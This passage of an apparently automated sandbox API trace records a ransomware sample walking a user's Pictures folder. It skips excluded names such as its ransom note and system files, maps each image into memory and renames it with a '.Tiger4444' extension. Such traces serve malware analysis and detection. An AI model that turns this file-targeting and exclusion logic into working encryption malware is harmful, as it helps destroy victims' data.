(in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=36760) returned 1 [0045.675] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0045.675] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0045.675] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x92a0, lpName=0x0) returned 0x2c8 [0045.675] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x92a0) returned 0xbe0000 [0045.676] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.676] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0045.676] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.676] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0045.676] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.676] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0045.676] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.677] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0045.677] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13712966781) returned 1 [0045.677] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0045.677] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0045.677] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.677] CloseHandle (hObject=0x2c8) returned 1 [0045.677] CloseHandle (hObject=0x260) returned 1 [0045.679] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\sg1EYYvYbFWAigsa.bmp.Tiger4444") returned 55 [0045.679] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\sg1EYYvYbFWAigsa.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sg1eyyvybfwaigsa.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\sg1EYYvYbFWAigsa.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\sg1eyyvybfwaigsa.bmp.tiger4444"), dwFlags=0x1) returned 1 [0045.679] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=36768 | out: Addend=0xc6f980) returned 18073040 [0045.680] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4521 [0045.680] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd023adb0, ftCreationTime.dwHighDateTime=0x1d4d29b, ftLastAccessTime.dwLowDateTime=0x8ba54e70, ftLastAccessTime.dwHighDateTime=0x1d4cb91, ftLastWriteTime.dwLowDateTime=0x8ba54e70, ftLastWriteTime.dwHighDateTime=0x1d4cb91, nFileSizeHigh=0x0, nFileSizeLow=0x17468, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sghof7ewON_UNTJ3.jpg", cAlternateFileName="SGHOF7~1.JPG")) returned 1 [0045.680] lstrcmpiW (lpString1="Sghof7ewON_UNTJ3.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.680] lstrcmpiW (lpString1="Sghof7ewON_UNTJ3.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.680] lstrcmpiW (lpString1="Sghof7ewON_UNTJ3.jpg", lpString2="Tiger4444.exe") returned -1 [0045.680] lstrcmpiW (lpString1="Sghof7ewON_UNTJ3.jpg", lpString2=".") returned 1 [0045.680] lstrcmpiW (lpString1="Sghof7ewON_UNTJ3.jpg", lpString2="..") returned 1 [0045.680] lstrcmpiW (lpString1="Sghof7ewON_UNTJ3.jpg", lpString2="windows") returned -1 [0045.680] lstrcmpiW (lpString1="Sghof7ewON_UNTJ3.jpg", lpString2="bootmgr") returned 1 [0045.680] lstrcmpiW (lpString1="Sghof7ewON_UNTJ3.jpg", lpString2="pagefile.sys") returned 1 [0045.680] lstrcmpiW (lpString1="Sghof7ewON_UNTJ3.jpg", lpString2="boot") returned 1 [0045.680] lstrcmpiW (lpString1="Sghof7ewON_UNTJ3.jpg", lpString2="ids.txt") returned 1 [0045.680] lstrcmpiW (lpString1="Sghof7ewON_UNTJ3.jpg", lpString2="NTUSER.DAT") returned 1 [0045.680] lstrcpyW (in: lpString1=0x30aeada, lpString2="Sghof7ewON_UNTJ3.jpg" | out: lpString1="Sghof7ewON_UNTJ3.jpg") returned="Sghof7ewON_UNTJ3.jpg" [0045.680] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Sghof7ewON_UNTJ3.jpg", dwFileAttributes=0x0) returned 1 [0045.680] lstrlenW (lpString="Sghof7ewON_UNTJ3.jpg") returned 20 [0045.680] lstrlenW (lpString="Tiger4444") returned 9 [0045.680] lstrcmpiW (lpString1="UNTJ3.jpg", lpString2="Tiger4444") returned 1 [0045.680] lstrlenW (lpString=".dll") returned 4 [0045.680] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0045.680] lstrlenW (lpString=".lnk") returned 4 [0045.680] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0045.680] lstrlenW (lpString=".ini") returned 4 [0045.680] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0045.680] lstrlenW (lpString=".sys") returned 4 [0045.680] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0045.680] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Sghof7ewON_UNTJ3.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\sghof7ewon_untj3.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.680] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.681] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13713363017) returned 1 [0045.681] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=95336) returned 1 [0045.681] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0045.681] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0045.681] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17770, lpName=0x0) returned 0x2c8 [0045.681] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17770) returned 0xbe0000 [0045.683] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.683] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0045.683] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.683] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.683] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.683] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.683] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.683] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0045.683] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13713621242) returned 1 [0045.683] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0045.683] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0045.683] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.684] CloseHandle (hObject=0x2c8) returned 1 [0045.684] CloseHandle (hObject=0x260) returned 1 [0045.687] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\Sghof7ewON_UNTJ3.jpg.Tiger4444") returned 55 [0045.687] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\Sghof7ewON_UNTJ3.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\sghof7ewon_untj3.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\Sghof7ewON_UNTJ3.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\sghof7ewon_untj3.jpg.tiger4444"), dwFlags=0x1) returned 1 [0045.687] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=95344 | out: Addend=0xc6f980) returned 18109808 [0045.687] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4523 [0045.687] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa43a4790, ftCreationTime.dwHighDateTime=0x1d4caf8, ftLastAccessTime.dwLowDateTime=0x6db0f610, ftLastAccessTime.dwHighDateTime=0x1d4cc79, ftLastWriteTime.dwLowDateTime=0x6db0f610, ftLastWriteTime.dwHighDateTime=0x1d4cc79, nFileSizeHigh=0x0, nFileSizeLow=0x8087, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SJe4.png", cAlternateFileName="")) returned 1 [0045.687] lstrcmpiW (lpString1="SJe4.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.687] lstrcmpiW (lpString1="SJe4.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.687] lstrcmpiW (lpString1="SJe4.png", lpString2="Tiger4444.exe") returned -1 [0045.687] lstrcmpiW (lpString1="SJe4.png", lpString2=".") returned 1 [0045.687] lstrcmpiW (lpString1="SJe4.png", lpString2="..") returned 1 [0045.687] lstrcmpiW (lpString1="SJe4.png", lpString2="windows") returned -1 [0045.688] lstrcmpiW (lpString1="SJe4.png", lpString2="bootmgr") returned 1 [0045.688] lstrcmpiW (lpString1="SJe4.png", lpString2="pagefile.sys") returned 1 [0045.688] lstrcmpiW (lpString1="SJe4.png", lpString2="boot") returned 1 [0045.688] lstrcmpiW (lpString1="SJe4.png", lpString2="ids.txt") returned 1 [0045.688] lstrcmpiW (lpString1="SJe4.png", lpString2="NTUSER.DAT") returned 1 [0045.688] lstrcpyW (in: lpString1=0x30aeada, lpString2="SJe4.png" | out: lpString1="SJe4.png") returned="SJe4.png" [0045.688] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\SJe4.png", dwFileAttributes=0x0) returned 1 [0045.688] lstrlenW (lpString="SJe4.png") returned 8 [0045.688] lstrlenW (lpString="Tiger4444") returned 9 [0045.688] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0045.688] lstrlenW (lpString=".dll") returned 4 [0045.688] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0045.688] lstrlenW (lpString=".lnk") returned 4 [0045.688] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0045.688] lstrlenW (lpString=".ini") returned 4 [0045.688] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0045.688] lstrlenW (lpString=".sys") returned 4 [0045.688] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0045.688] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\SJe4.png" (normalized: "c:\\users\\fd1hvy\\pictures\\sje4.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.688] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.688] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13714141174) returned 1 [0045.688] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=32903) returned 1 [0045.688] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0045.688] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0045.688] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8390, lpName=0x0) returned 0x2c8 [0045.689] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8390) returned 0xbe0000 [0045.690] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.690] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0045.690] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.690] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0045.690] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.690] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0045.690] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.690] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0045.690] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13714306799) returned 1 [0045.690] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0045.690] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc720c0 | out: hHeap=0xc50000) returned 1 [0045.690] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.690] CloseHandle (hObject=0x2c8) returned 1 [0045.691] CloseHandle (hObject=0x260) returned 1 [0045.692] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\SJe4.png.Tiger4444") returned 43 [0045.692] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\SJe4.png" (normalized: "c:\\users\\fd1hvy\\pictures\\sje4.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\SJe4.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\sje4.png.tiger4444"), dwFlags=0x1) returned 1 [0045.693] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=32912 | out: Addend=0xc6f980) returned 18205152 [0045.693] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4525 [0045.693] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7f4b970, ftCreationTime.dwHighDateTime=0x1d4c935, ftLastAccessTime.dwLowDateTime=0x719cc4b0, ftLastAccessTime.dwHighDateTime=0x1d4d1a7, ftLastWriteTime.dwLowDateTime=0x719cc4b0, ftLastWriteTime.dwHighDateTime=0x1d4d1a7, nFileSizeHigh=0x0, nFileSizeLow=0x3bdd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="snTK_4Hws.bmp", cAlternateFileName="SNTK_4~1.BMP")) returned 1 [0045.693] lstrcmpiW (lpString1="snTK_4Hws.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.693] lstrcmpiW (lpString1="snTK_4Hws.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.693] lstrcmpiW (lpString1="snTK_4Hws.bmp", lpString2="Tiger4444.exe") returned -1 [0045.693] lstrcmpiW (lpString1="snTK_4Hws.bmp", lpString2=".") returned 1 [0045.693] lstrcmpiW (lpString1="snTK_4Hws.bmp", lpString2="..") returned 1 [0045.693] lstrcmpiW (lpString1="snTK_4Hws.bmp", lpString2="windows") returned -1 [0045.693] lstrcmpiW (lpString1="snTK_4Hws.bmp", lpString2="bootmgr") returned 1 [0045.693] lstrcmpiW (lpString1="snTK_4Hws.bmp", lpString2="pagefile.sys") returned 1 [0045.693] lstrcmpiW (lpString1="snTK_4Hws.bmp", lpString2="boot") returned 1 [0045.693] lstrcmpiW (lpString1="snTK_4Hws.bmp", lpString2="ids.txt") returned 1 [0045.693] lstrcmpiW (lpString1="snTK_4Hws.bmp", lpString2="NTUSER.DAT") returned 1 [0045.693] lstrcpyW (in: lpString1=0x30aeada, lpString2="snTK_4Hws.bmp" | out: lpString1="snTK_4Hws.bmp") returned="snTK_4Hws.bmp" [0045.693] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\snTK_4Hws.bmp", dwFileAttributes=0x0) returned 1 [0045.694] lstrlenW (lpString="snTK_4Hws.bmp") returned 13 [0045.694] lstrlenW (lpString="Tiger4444") returned 9 [0045.694] lstrcmpiW (lpString1="_4Hws.bmp", lpString2="Tiger4444") returned -1 [0045.694] lstrlenW (lpString=".dll") returned 4 [0045.694] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0045.694] lstrlenW (lpString=".lnk") returned 4 [0045.694] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0045.694] lstrlenW (lpString=".ini") returned 4 [0045.694] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0045.694] lstrlenW (lpString=".sys") returned 4 [0045.694] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0045.694] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\snTK_4Hws.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sntk_4hws.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.694] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.694] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13714723481) returned 1 [0045.694] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=15325) returned 1 [0045.694] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0045.694] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0045.694] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3ee0, lpName=0x0) returned 0x2c8 [0045.694] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3ee0) returned 0xbe0000 [0045.695] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.695] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.695] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.695] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0045.695] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.695] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0045.695] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.695] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.695] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13714854938) returned 1 [0045.695] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0045.696] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0045.696] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.696] CloseHandle (hObject=0x2c8) returned 1 [0045.696] CloseHandle (hObject=0x260) returned 1 [0045.697] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\snTK_4Hws.bmp.Tiger4444") returned 48 [0045.697] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\snTK_4Hws.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sntk_4hws.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\snTK_4Hws.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\sntk_4hws.bmp.tiger4444"), dwFlags=0x1) returned 1 [0045.698] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=15328 | out: Addend=0xc6f980) returned 18238064 [0045.698] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4526 [0045.698] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f60180, ftCreationTime.dwHighDateTime=0x1d4d305, ftLastAccessTime.dwLowDateTime=0x635ae930, ftLastAccessTime.dwHighDateTime=0x1d4cd7f, ftLastWriteTime.dwLowDateTime=0x635ae930, ftLastWriteTime.dwHighDateTime=0x1d4cd7f, nFileSizeHigh=0x0, nFileSizeLow=0x10b83, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tbI35.png", cAlternateFileName="")) returned 1 [0045.698] lstrcmpiW (lpString1="tbI35.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.698] lstrcmpiW (lpString1="tbI35.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.698] lstrcmpiW (lpString1="tbI35.png", lpString2="Tiger4444.exe") returned -1 [0045.698] lstrcmpiW (lpString1="tbI35.png", lpString2=".") returned 1 [0045.699] lstrcmpiW (lpString1="tbI35.png", lpString2="..") returned 1 [0045.699] lstrcmpiW (lpString1="tbI35.png", lpString2="windows") returned -1 [0045.699] lstrcmpiW (lpString1="tbI35.png", lpString2="bootmgr") returned 1 [0045.699] lstrcmpiW (lpString1="tbI35.png", lpString2="pagefile.sys") returned 1 [0045.699] lstrcmpiW (lpString1="tbI35.png", lpString2="boot") returned 1 [0045.699] lstrcmpiW (lpString1="tbI35.png", lpString2="ids.txt") returned 1 [0045.699] lstrcmpiW (lpString1="tbI35.png", lpString2="NTUSER.DAT") returned 1 [0045.699] lstrcpyW (in: lpString1=0x30aeada, lpString2="tbI35.png" | out: lpString1="tbI35.png") returned="tbI35.png" [0045.699] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\tbI35.png", dwFileAttributes=0x0) returned 1 [0045.699] lstrlenW (lpString="tbI35.png") returned 9 [0045.699] lstrlenW (lpString="Tiger4444") returned 9 [0045.699] lstrcmpiW (lpString1="tbI35.png", lpString2="Tiger4444") returned -1 [0045.699] lstrlenW (lpString=".dll") returned 4 [0045.699] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0045.699] lstrlenW (lpString=".lnk") returned 4 [0045.699] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0045.699] lstrlenW (lpString=".ini") returned 4 [0045.699] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0045.699] lstrlenW (lpString=".sys") returned 4 [0045.699] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0045.699] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\tbI35.png" (normalized: "c:\\users\\fd1hvy\\pictures\\tbi35.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.699] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.699] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13715247202) returned 1 [0045.699] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=68483) returned 1 [0045.699] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0045.699] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0045.700] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10e90, lpName=0x0) returned 0x2c8 [0045.700] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10e90) returned 0xbe0000 [0045.701] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.701] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.701] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.701] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0045.701] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.701] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0045.701] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.701] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.701] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13715460157) returned 1 [0045.702] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0045.702] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0045.702] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.702] CloseHandle (hObject=0x2c8) returned 1 [0045.702] CloseHandle (hObject=0x260) returned 1 [0045.704] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\tbI35.png.Tiger4444") returned 44 [0045.704] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\tbI35.png" (normalized: "c:\\users\\fd1hvy\\pictures\\tbi35.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\tbI35.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\tbi35.png.tiger4444"), dwFlags=0x1) returned 1 [0045.705] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=68496 | out: Addend=0xc6f980) returned 18253392 [0045.705] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4527 [0045.705] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4681a50, ftCreationTime.dwHighDateTime=0x1d4cd33, ftLastAccessTime.dwLowDateTime=0x7e93e170, ftLastAccessTime.dwHighDateTime=0x1d4cbef, ftLastWriteTime.dwLowDateTime=0x7e93e170, ftLastWriteTime.dwHighDateTime=0x1d4cbef, nFileSizeHigh=0x0, nFileSizeLow=0xf7ab, dwReserved0=0xa0000003, dwReserved1=0x0, 